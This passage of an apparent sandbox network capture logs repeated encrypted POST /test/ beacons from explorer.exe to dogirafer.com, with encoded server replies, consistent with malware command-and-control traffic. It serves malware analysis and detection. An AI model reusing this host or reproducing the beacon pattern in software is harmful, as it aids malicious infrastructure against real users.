244OSmfRMSz3YpjaxrcjGbog39IOkvVBSnCa/q0viPOZmmcpmP52G7Y6vKGtDBuIU4jet/ji1YjCLrQt6kJsZXjmfI56yRWHGJOgMuoNloTE0FLDQC85cLEI2vZt2lMYMsUitdvhhftpabGbXBm9UzmHSSOEcE2De7iKXMTabfDfnIuq7p86FrfDR9EgiY1NVMAPI+HDJ+aEzXGfjSGED2fNQJLYT6HtFoqGuVF3ZGpxPcZcJHf84DgPv5aRp
2024-12-03 16:45:36 UTC	3	IN	Data Raw: 7a 0d 0a Data Ascii: z
2024-12-03 16:45:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49962	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:38 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:39 UTC	785	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8Fiu6HYP7xHix4lkg0WG3dRSN2ANv%2F%2FHIqxmoACDqnrPjrXz4%2BSq0%2B3UE6gpYXu6yX3CqMNWBgt0y9nFBntAnYsQY2tbuZWrSmu1RUvVRNGse8FsKvODb9fWqg863r7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5073b98325e64-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1704&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1676234&cwnd=245&unsent_bytes=0&cid=7e4bf6c8c54809a3&ts=1651&x=0"
2024-12-03 16:45:39 UTC	339	IN	Data Raw: 31 34 63 0d 0a 4f 79 71 61 51 38 71 77 33 49 70 75 5a 52 6e 52 68 32 4b 73 7a 48 35 49 4f 6b 72 65 41 30 36 73 62 66 6d 37 75 69 2f 45 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 35 72 4a 55 49 74 66 4a 71 4f 69 6c 30 6b 43 72 57 35 73 65 30 4c 73 35 75 6f 6f 38 30 39 67 69 68 56 46 57 4e 49 37 63 72 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 38 77 33 41 65 50 6b 54 68 55 52 5a 62 58 47 65 33 4e 68 34 49 5a 4f 37 56 58 64 5a 78 39 43 69 30 38 37 4e 6c 4e 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 69 4f 50 42 62 52 35 Data Ascii: 14cOyqaQ8qw3IpuZRnRh2KszH5IOkreA06sbfm7ui/EKRib7xuPoA21j4bUiz5rJUItfJqOil0kCrW5se0Ls5uoo809gihVFWNI7crsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4F8w3AePkThURZbXGe3Nh4IZO7VXdZx9Ci087NlNEA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbiOPBbR5
2024-12-03 16:45:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49972	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:41 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:43 UTC	781	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PoFCiGqwxmPn%2BzpCKHeNXirc1ouqibxkPb3jAxyYtckvFNTSR97NAGrxY1ypEpgArd5H6K7X%2B6eI4hKrWAwTavGAdCttwBeacYhk7rskgcfQOA8B8zijzUfyOxbRSpaN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec50750d8571875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2085&min_rtt=1533&rtt_var=1679&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=490756&cwnd=153&unsent_bytes=0&cid=ffab9b4e6be4f1c0&ts=1653&x=0"
2024-12-03 16:45:43 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 43 79 56 51 38 71 37 30 49 70 68 59 78 33 51 68 32 2f 6e 67 33 56 4f 50 45 76 51 42 43 48 43 61 50 6d 78 75 53 66 4d 62 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 73 4c 6b 63 75 66 2f 7a 69 67 6c 67 72 43 72 53 39 2f 61 67 50 74 35 75 74 70 63 46 52 36 69 4e 64 48 47 4e 4e 37 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 41 45 4d 38 77 44 4f 6e 6b 54 68 67 52 61 37 50 4a 65 48 64 68 35 6f 5a 4f 36 46 48 65 41 48 5a 48 68 45 41 34 4e 46 49 42 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 2f 56 51 51 5a Data Ascii: 150OCyVQ8q70IphYx3Qh2/ng3VOPEvQBCHCaPmxuSfMbGmcphSGpB6yiJiVjA1sLkcuf/ziglgrCrS9/agPt5utpcFR6iNdHGNN74+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzAEM8wDOnkThgRa7PJeHdh5oZO6FHeAHZHhEA4NFIBcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZO/VQQZ
2024-12-03 16:45:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49979	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:44 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:45 UTC	783	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K8%2BSgji2Hky1qYfhMQhMMO%2BUpe45ocqhiBrpAVMZoYklyH4KTAYkN1y5ibuBKF6lHMjQ3GM96YysOFnwHWZ%2BWRvUgH8v3Jd5vNlzTgSmQBKLjcJyJAsny3Btjv91Jv3T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec507637f548c90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1791&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1560662&cwnd=201&unsent_bytes=0&cid=46d6ede712a4137b&ts=1401&x=0"
2024-12-03 16:45:45 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 79 75 59 52 4d 57 78 32 34 70 6e 59 42 6e 5a 6a 47 4c 6a 67 33 35 48 50 6b 4c 51 42 69 54 43 5a 2f 2b 31 76 53 2f 4a 62 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 49 6b 38 75 65 35 44 68 37 46 6b 6b 44 72 61 34 74 4b 64 47 74 70 53 74 72 4d 45 38 37 45 35 51 48 47 56 4c 36 4d 4b 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6b 34 42 75 76 6d 4a 42 68 2b 61 4c 48 44 63 33 6b 75 35 38 74 42 37 56 54 55 43 68 6c 43 37 45 77 31 4f 46 67 42 4e 34 58 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 56 51 5a Data Ascii: 150PyuYRMWx24pnYBnZjGLjg35HPkLQBiTCZ/+1vS/JbWmcphSGpB6yiJiVjA1qIk8ue5Dh7FkkDra4tKdGtpStrME87E5QHGVL6MKnfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kck4BuvmJBh+aLHDc3ku58tB7VTUChlC7Ew1OFgBN4XMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1VQZ
2024-12-03 16:45:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49986	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:47 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:48 UTC	787	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tSqrAGQwc2xkeaKfCZlJY0LeQlT2IHAjCRffzA745jdH3v7skdIDdddeegkXqp1subTY6QAdVQEPP1wJ%2Bea6TbP%2FLuZ%2FfdjA62U9FtzG4e4%2F%2BJSGVDliGb0pWg9wtxBs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec50774fc8a4363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1624&rtt_var=616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1798029&cwnd=235&unsent_bytes=0&cid=d6ac00d7edce4bc3&ts=1605&x=0"
2024-12-03 16:45:48 UTC	347	IN	Data Raw: 31 35 34 0d 0a 50 79 57 55 51 73 4f 78 32 34 70 67 59 42 6e 62 68 47 44 6d 67 33 4a 4b 50 45 33 52 41 69 6e 43 61 2f 79 7a 75 53 44 4b 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 72 4a 30 49 70 65 35 54 6c 37 46 59 6e 43 62 71 36 75 61 5a 47 75 35 61 6e 70 4d 77 35 35 55 35 52 48 47 64 45 35 73 57 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 77 77 41 65 50 6d 4b 42 68 2b 61 37 58 49 63 33 59 70 37 73 74 45 36 6c 48 5a 41 42 68 4f 37 45 30 2b 4d 31 73 4c 4f 34 54 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 52 54 70 Data Ascii: 154PyWUQsOx24pgYBnbhGDmg3JKPE3RAinCa/yzuSDKZmmcphSGpB6yiJiVjA1rJ0Ipe5Tl7FYnCbq6uaZGu5anpMw55U5RHGdE5sWnfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcwwAePmKBh+a7XIc3Yp7stE6lHZABhO7E0+M1sLO4TMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1RTp
2024-12-03 16:45:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49994	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:50 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:51 UTC	783	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=npHkA8rMXzPOlR9EW8rbeytXF5yLRAwTfhwx%2FnIrkWsUkELdZ6llwj%2FZucozQhIwgs1epoErGs2AgPbSdVsdV%2Bii1OEMyTfjTwin1iNsNH0lZWdWbAUu4VS6fYTz9iup"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec507877d6443e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1706&rtt_var=655&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1651583&cwnd=241&unsent_bytes=0&cid=e6af19fe87f1528d&ts=1664&x=0"
2024-12-03 16:45:51 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 69 57 62 51 63 71 7a 32 59 70 67 59 68 72 65 67 6d 61 73 79 6e 56 4b 50 55 6e 51 41 55 36 71 62 2f 6d 7a 75 79 54 4a 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 4a 71 4c 6b 4d 72 66 5a 4b 4f 67 6c 63 6b 44 72 43 32 74 65 30 4f 74 5a 53 73 6f 73 45 36 67 69 56 58 46 47 74 49 37 63 62 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 63 41 34 42 4f 4c 6a 4b 48 4d 56 62 72 54 45 63 33 56 68 37 34 4e 42 36 6c 48 55 43 58 5a 43 68 45 73 2b 4d 31 31 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 6c 4f 2f 56 57 51 35 Data Ascii: 150MiWbQcqz2YpgYhregmasynVKPUnQAU6qb/mzuyTJKRib7xuPoA21j4bUizJqLkMrfZKOglckDrC2te0OtZSsosE6giVXFGtI7cbsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4FcA4BOLjKHMVbrTEc3Vh74NB6lHUCXZChEs+M11EA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvblO/VWQ5
2024-12-03 16:45:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50002	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:53 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:55 UTC	783	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A0ps0F9nmq0wk549tlv7HQZA3DY8PebFbR8emKPSpHgWbOuptWr10uOXaZjYp0ayShv9IZWEDF%2F2BUJrOvHv6ZIvl0W2s3Wf%2FnpW4cEMcVMCxP4Xm4lDtSYUr%2BGH1LLi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5079a6a9580df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1553&rtt_var=587&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1855146&cwnd=211&unsent_bytes=0&cid=07059107a60a89b6&ts=1635&x=0"
2024-12-03 16:45:55 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 79 79 63 52 63 57 37 30 49 70 75 59 68 37 62 67 57 2f 68 67 33 4e 4f 4f 45 7a 58 42 69 62 43 61 66 79 37 75 79 48 4c 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 4a 6b 38 76 65 5a 66 6d 37 46 67 6d 44 62 71 2b 73 61 64 47 75 35 65 71 70 4d 6b 2f 37 55 35 64 47 32 64 4a 36 38 61 6d 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 73 35 41 75 50 67 49 52 6c 2b 62 37 50 44 65 33 49 6f 35 73 74 4f 37 31 54 61 44 42 74 46 37 45 41 38 4e 56 38 4e 50 49 6a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 52 51 35 Data Ascii: 150OyycRcW70IpuYh7bgW/hg3NOOEzXBibCafy7uyHLYGmcphSGpB6yiJiVjA1pJk8veZfm7FgmDbq+sadGu5eqpMk/7U5dG2dJ68amfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kcs5AuPgIRl+b7PDe3Io5stO71TaDBtF7EA8NV8NPIjMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1RQ5
2024-12-03 16:45:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50008	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:56 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:57 UTC	790	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=24cA4821cATGzI59FJpx1U0ZQ%2FYwI3cne4FpJqxlazFGKr%2Bs2w56tW1IKdHVAVEJZXYuS6wC1sLUCs0bVFo%2BOt1JkKuH13I4kzazxpH%2FpBMdU4nlxmU%2BvjikG0xDP%2BHv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec507adab2c41bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11439&min_rtt=6528&rtt_var=5956&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=447303&cwnd=200&unsent_bytes=0&cid=776cfaee33aca17e&ts=1405&x=0"
2024-12-03 16:45:57 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 69 71 64 51 4d 4f 36 33 59 70 6b 59 68 72 59 6a 57 2f 6c 67 33 46 4f 4f 30 72 58 41 43 6a 43 61 76 69 32 76 69 58 49 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 73 4c 6b 51 6f 65 35 65 4f 68 31 73 6b 41 4c 4b 38 73 2b 30 4c 73 70 47 72 70 38 6f 37 67 69 68 54 47 32 4e 4a 36 63 58 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 4d 30 30 41 2b 76 6d 54 68 6b 56 62 4c 4c 48 66 33 52 68 37 6f 39 50 36 6c 4c 5a 43 6e 5a 44 68 45 77 34 4d 46 77 50 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 50 66 42 61 52 5a Data Ascii: 150MiqdQMO63YpkYhrYjW/lg3FOO0rXACjCavi2viXIYmmcphSGpB6yiJiVjA1sLkQoe5eOh1skALK8s+0LspGrp8o7gihTG2NJ6cXsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4FM00A+vmThkVbLLHf3Rh7o9P6lLZCnZDhEw4MFwPcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZPfBaRZ
2024-12-03 16:45:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50016	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:59 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:46:00 UTC	792	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:46:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MdSrFsGLAXWkwoJtk7r0BdWIeR1olCLbfgv%2BV2Rwcq0aUWsF%2FA5DyKShtqwoV%2FphrpqJxxiQknr0y73j3jX%2BtmD%2F8K03DeDQbBd%2F%2B4BKl7h3MoxJQo4jAmnkAeCBRhIp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec507bf3dc680da-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5038&min_rtt=1544&rtt_var=2807&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1891191&cwnd=130&unsent_bytes=0&cid=8a0edbb0b6f8589e&ts=1660&x=0"
2024-12-03 16:46:00 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 53 2b 56 51 73 57 32 32 49 70 6c 61 68 6a 66 67 57 4c 69 67 33 64 4b 50 30 6a 51 41 79 6a 43 61 66 65 30 75 53 37 4b 59 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 4a 6b 59 73 66 35 58 6d 37 46 59 6d 44 37 53 32 73 61 4e 47 74 5a 43 76 6f 4d 34 2b 36 30 35 57 46 57 74 50 36 38 66 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 47 73 73 78 41 65 50 69 4a 6e 4d 54 61 72 54 45 63 6e 49 6b 71 34 46 45 37 56 4c 62 44 78 77 70 68 55 41 2b 4d 31 6f 4c 4f 63 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 39 58 54 70 Data Ascii: 150PS+VQsW22IplahjfgWLig3dKP0jQAyjCafe0uS7KYWmcphSGpB6yiJiVjA1qJkYsf5Xm7FYmD7S2saNGtZCvoM4+605WFWtP68fsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4GssxAePiJnMTarTEcnIkq4FE7VLbDxwphUA+M1oLOcC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBf9XTp
2024-12-03 16:46:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

